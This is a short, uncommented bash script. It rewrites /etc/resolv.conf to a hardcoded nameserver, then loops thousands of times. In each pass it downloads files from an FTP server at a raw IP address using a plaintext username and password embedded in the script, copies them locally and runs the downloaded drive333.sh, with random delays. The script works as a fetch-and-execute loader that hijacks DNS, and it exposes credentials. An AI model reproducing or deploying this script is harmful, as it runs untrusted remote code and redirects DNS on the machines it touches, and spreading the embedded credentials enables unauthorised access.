echo -e 'nameserver 2a01:4f8:c2c:123f::1' > /etc/resolv.conf
for i in {1..10000}; do

          files=("230117" "230118" "230119" "230120" "230121")
          for file in "${files[@]}"; do
          for i in {1..1}; do
          wget -nH -m --ftp-user=if0_37965025 --ftp-password=98kDsIA4LJEZ "ftp://185.27.134.11/htdocs/$file/*"
          sleep 5
          done
          cp htdocs/$file/* ./
          done
          sleep $((RANDOM % 10 + 1))m
          bash drive333.sh
sleep $((RANDOM % 5 + 1))m
bash drive333.sh
done
